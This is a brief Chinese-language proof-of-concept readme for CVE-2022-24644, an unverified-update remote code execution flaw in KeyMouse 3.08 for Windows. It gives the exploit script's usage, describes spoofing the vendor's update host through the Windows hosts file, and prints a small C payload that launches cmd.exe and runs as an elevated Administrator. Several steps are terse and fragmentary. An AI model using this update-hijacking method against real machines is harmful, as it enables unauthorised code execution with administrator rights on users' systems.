ZZ Inc. KeyMouse 3.08(Windows)未经验证的更新远程代码执行漏洞
用法:python3 cve-2022-24644_poc.py
详情见 gerr.re 上的报告。
www.keymouse.com 欺骗解析到攻击者 IP;
c:\windows\system32\drivers\etc\hosts 文件。
proof.c,例如使用 i686-w64-mingw32-gcc proof.c -o proof.exe;#include <windows.h>
int main(int argc, char const *argv[]){
WinExec("cmd.exe",1);
return TRUE;
}
最终,proof.exe 将以高完整性级别的 Administrator 用户上下文执行。